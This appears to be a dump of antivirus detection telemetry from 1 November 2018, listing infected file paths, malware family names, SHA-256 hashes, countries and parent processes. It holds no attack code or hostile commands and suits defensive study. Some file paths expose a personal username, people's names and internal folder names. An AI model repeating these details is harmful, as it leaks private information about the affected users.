  Row(detection=Row(filename='avscan-20181101-163210-ade45c56', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c9a063d9\\AVSCAN-20181031-205810-8E73B4A7\\AVSCAN-20181101-163210-ADE45C56', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='398b9784731795a2a9159ae69dea840751d74fbe0f64b1e1929ea2fce6c6f138', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T15:32:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='manfred kirchgessner 16.03.2017.com', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_Manfred Kirchgessner 16.03.2017.zip\\Manfred Kirchgessner 16.03.2017.com', filesize=704000, name='HEUR/AGEN.1014955.#M1.#R1'), hash='0340cb52b73987678952ae42cbe81058dee4f54c8dbf0388b6905a92d3f36210', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3611368, timestamp='2018-11-01T10:13:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:18:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:49:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152535-42c04464', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c591ee81\\AVSCAN-20181101-152056-1BEC4832\\AVSCAN-20181101-152535-42C04464', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:44:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-180556-75b9942b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_170ae493\\AVSCAN-20181101-180326-5A952DDD\\AVSCAN-20181101-180556-75B9942B', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:05:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='foto.bat', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\FD PAK HERMAN\\hari terakhir\\Foto\\Foto.bat', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:23:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='20.10.14.pif', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\DINI\\LPA\\PERSIAPAN AUDIT\\LAPORAN P2K3\\P2K3 OKTOBER 2014\\DOKUMENTASI\\T.MC 20.10.14\\20.10.14.pif', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:22:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='oobebaln.exe', filepath='D:\\Backup\\Windows\\system32\\oobe\\oobebaln.exe', filesize=256000, name='W32/Sality.AT.#M1.#R1'), hash='08b681b20838b782823dabc5f882d2a9ed64e6182fe34777be72fd64ee769d85', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:24:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152444-3bbac83d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c591ee81\\AVSCAN-20181101-152056-1BEC4832\\AVSCAN-20181101-152444-3BBAC83D', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:43:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='nc 33.bat', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\DINI\\RPG\\AUDIT\\Suggestion Corrective Action\\TEMUAN CAP AEON\\NC 33\\NC 33.bat', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:23:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T02:02:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-082146-703820cc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_726086d7\\AVSCAN-20181101-082124-6D316C97\\AVSCAN-20181101-082146-703820CC', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T00:21:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-190851-172dc30e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6a27c5c9\\AVSCAN-20181101-190219-D4548F48\\AVSCAN-20181101-190851-172DC30E', filesize=64000, name='TR/Agent.wxqvk.#M1.#R1'), hash='3158f958bd97188137ab047ed4a4963579c6eb8cfb7d5bb9e4da03d817cb1f72', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:08:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\aswidsagent.exe', parentsize=6800144, timestamp='2018-11-01T01:45:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='terima.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\DINI\\LPA\\BPJS KESEHATAN\\2015\\Tanda Terima\\Terima.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:22:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-151845-09a7f487', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c591ee81\\AVSCAN-20181101-151340-DF30F2CA\\AVSCAN-20181101-151845-09A7F487', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:37:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155034-8ad64703', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155034-8AD64703', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:50:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-172208-cf3294bc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5a6b3617\\AVSCAN-20181101-171731-A569503C\\AVSCAN-20181101-172208-CF3294BC', filesize=64000, name='W97M/Agent.2975818.#M1.#R1'), hash='0d941b5226c82804d490653cb4464e1b60b6439e7e0a901fcc563ec1437f17be', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T15:22:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='44f95b3635ef0851d461df529ae63747e7b923c9cf8d640198a3e85c4dc8e110', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-01T19:16:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='\\\\?\\C:\\Windows\\Temp\\nsj5682.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='NL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:32:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\nsbFE42.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:38:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flash_tool.exe', filepath='D:\\china\\SP_Flash_Tool_v5.1504_Win\\SP_Flash_Tool_5.1504\\flash_tool.exe', filesize=8320000, name='W32/Sality.AT.#M1.#R1'), hash='5a412a2588a0d51ce109aef669889763ab73e6f644595486c2c613f7bddbd0c1', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='D:\\china\\HUAWEI_Y336-U02_Firmware_V100R001C328B109_05021UAY_Sri Lanka\\Software\\Y336-U02V100R001C328B109\\Software\\Upgtade tools&drivers\\ResearchDownload_2.9.9016\\Bin\\ResearchDownload.exe', parentsize=1687552, timestamp='2018-11-01T14:46:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='e72aafea9c8d894b6a31480c29bc1d7fa212179018f8cc4fc1d7dcec5a36d9b5', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-17.available\\Avira\\E72AAFEA9C8D894B6A31480C29BC1D7FA212179018F8CC4FC1D7DCEC5A36D9B5', filesize=900000, name='W32/Sivis.A.#M1.#R1'), hash='e72aafea9c8d894b6a31480c29bc1d7fa212179018f8cc4fc1d7dcec5a36d9b5', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T09:18:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wuauserv.exe', filepath='C:\\Windows\\SysWOW64\\drivers\\UMDF\\tr-KL\\wuauserv.exe', filesize=448000, name='W32/Hlubea.Z.#M1.#R1'), hash='927986f56707e3dfe2adca5e4224417a764405e155f4ac1e60ddf7b6085c8c2c', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T21:47:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='plugin.dll', filepath='F:\\狗頭\\Anubis-Lineage Mobile Bot_V1.1.8.5\\Anubis-Lineage Mobile Bot\\plugin.dll', filesize=2560000, name='TR/BHO.Gen.#M300.#R3363'), hash='5da2bc60bcb4645cc005ccad3fbd9a109dbaa948506a9ccaab246c034bd5aa30', metadata=Row(cmdline='\\\\\\/s \\\\\\".\\\\\\\\plugin.dll\\\\\\"', country='TW', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\SysWOW64\\regsvr32.exe', parentsize=20992, timestamp='2018-11-01T14:09:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='d9d418d45271431c7dbbd74b71f38f5e6284fa435c2574f2f68592a74f497344', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-31\\D9D418D45271431C7DBBD74B71F38F5E6284FA435C2574F2F68592A74F497344', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='d9d418d45271431c7dbbd74b71f38f5e6284fa435c2574f2f68592a74f497344', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:13:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-122037-a2e9273d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_425e6008\\AVSCAN-20181101-122024-A11D095D\\AVSCAN-20181101-122037-A2E9273D', filesize=320000, name='TR/SPY.320000.6.#M1.#R1'), hash='d1166cbc7a2419c8c207cf4a60944bb73826a2a482f68a0e014a84591ad2d563', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T11:20:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tv.exe', filepath='C:\\Progs5\\Aldist\\TV.exe', filesize=4928000, name='TR/Agent.ugljo.#M1.#R1'), hash='6d7b13673e4f0f9804f2f521f9070816d5cccc266b8dc427137433935cfe2f27', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Progs5\\Aldist\\estoque.exe', parentsize=37468160, timestamp='2018-11-01T16:59:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-141101-019b69aa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_13cc31a3\\AVSCAN-20181101-140956-FB5DC91F\\AVSCAN-20181101-141101-019B69AA', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:11:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='$r3vcqpq.exe', filepath='C:\\$Recycle.Bin\\S-1-5-21-2192791235-2971643662-3870428667-1000\\$R3VCQPQ.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T02:46:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ea1f9dcdbc3009f1f38cefddd6e4fee6ec220939a5310f6ac6eda3448af3372c', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-31\\EA1F9DCDBC3009F1F38CEFDDD6E4FEE6EC220939A5310F6AC6EDA3448AF3372C', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='ea1f9dcdbc3009f1f38cefddd6e4fee6ec220939a5310f6ac6eda3448af3372c', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:14:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-112055-45ec9846', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-112055-45EC9846', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:20:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='C:\\Windows\\Temp\\nss9C09.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline='\\\\\\/MONITOR \\\\\\/uac', country='VN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\CCleaner\\CCleaner64.exe', parentsize=18630056, timestamp='2018-11-01T08:15:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-195024-d6629442', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_058d263d\\AVSCAN-20181101-194346-9A701436\\AVSCAN-20181101-195024-D6629442', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='c4836d1b3b39ff36fa8be98d2e4013e1b4b81ad2e96905fe3bc53fbe46c7ab64', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T18:50:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='diagnosticshub.standardcollector.service.exe', filepath='C:\\Windows\\System32\\DiagSvcs\\DiagnosticsHub.StandardCollector.Service.exe', filesize=64000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='a96290b02ca8f9ec46bf2021980c1cdb156290d0d603123a65cf58b56323af56', metadata=Row(cmdline=None, country='TN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:07:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gsdx32-sse4.dll', filepath='H:\\模擬器\\pcsx2-v1.5.0-dev-2014-gb2a2a3a-windows-x86\\plugins\\GSdx32-SSE4.dll', filesize=2432000, name='W32/Ramnit.CD.#M1.#R1'), hash='71b4c7e7e80e54d814e542d3075a9d0b62831b950076c5b2189f63f0e4585f9a', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Internet Explorer\\iexplore.exe', parentsize=815304, timestamp='2018-11-01T14:46:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181031-222745-9f00d727', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_114e5570\\AVSCAN-20181031-212005-98436303\\AVSCAN-20181031-222745-9F00D727', filesize=64000, name='TR/Rogue.7547256.#M1.#R1'), hash='d8f3b8709ebc205cb05e8cb0bfb9c041b8eebd0e2825b6b71d1d265f77117514', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:27:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flashupdate (3).exe', filepath='\\\\?\\C:\\Users\\X\\Downloads\\flashupdate (3).exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='AZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:40:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='~6e4c7221.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6e4c7221.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='813279b1aee8249802ea399c68af28e6df334a393b3804d3e11c83e788bc4fc8', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-01T03:57:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-190401-e5c45127', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6a27c5c9\\AVSCAN-20181101-190124-CAF68D09\\AVSCAN-20181101-190401-E5C45127', filesize=64000, name='BDS/Rogue.766033.#M1.#R1'), hash='b2b0f58fa1af9c59f6d9f33219f003bfd2fd1044818f2d998d754fa3f7043a74', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:04:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='software.exe', filepath='C:\\Users\\X\\Foxit Software\\Software.exe', filesize=512000, name='TR/Taranis.2886.#M1.#R1'), hash='5d7619a3ea0a69ca84d26878d6cc2d60a93f9b95f23d937c064d5ba9043b9405', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:57:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-182351-cae5b07b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_60e29655\\AVSCAN-20181101-163445-6099BE60\\AVSCAN-20181101-182351-CAE5B07B', filesize=960000, name='ADWARE/iBryte.Gen7.#M1.#R1'), hash='4a50b9a6b64b45f389bdcfbde2bb6d69000dd9c8175cbdfc40b7cdfc35773fb2', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T10:24:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T22:39:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-192210-106af960', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d9ad5824\\AVSCAN-20181101-192108-08E892DA\\AVSCAN-20181101-192210-106AF960', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T18:21:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-173806-618c5c86', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_29d67868\\AVSCAN-20181101-171852-E21F9068\\AVSCAN-20181101-173806-618C5C86', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T16:38:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-193116-33802823', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ecc6b11a\\AVSCAN-20181101-193055-2FF83737\\AVSCAN-20181101-193116-33802823', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='CH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T18:31:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pirke_maurice.doc', filepath='C:\\Users\\X\\Documents\\5.1 6.1 7.1 8.1\\Deckblätter_6_1_2HJ_16_17\\Pirke_Maurice.doc', filesize=64000, name='HEUR/Macro.Downloader.AMCY.Gen.#M1.#R1'), hash='03313ef6b59445d0491b38fad851ebb89a6e73751b567b84544002c83218995e', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe23_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe23 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T16:24:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='1e8b1a48a5f26d10b9aa84efaa48ce7a0cd2ab93e74febd5bbca5b35bb850bdd', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-10.available\\Avira\\1E8B1A48A5F26D10B9AA84EFAA48CE7A0CD2AB93E74FEBD5BBCA5B35BB850BDD', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='1e8b1a48a5f26d10b9aa84efaa48ce7a0cd2ab93e74febd5bbca5b35bb850bdd', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T07:24:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-153246-ca057b35', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1da8a17c\\AVSCAN-20181101-153226-C7EF38FC\\AVSCAN-20181101-153246-CA057B35', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='CO', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T21:32:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T22:33:03Z'), dt=datetime.date(2018, 11, 1)),
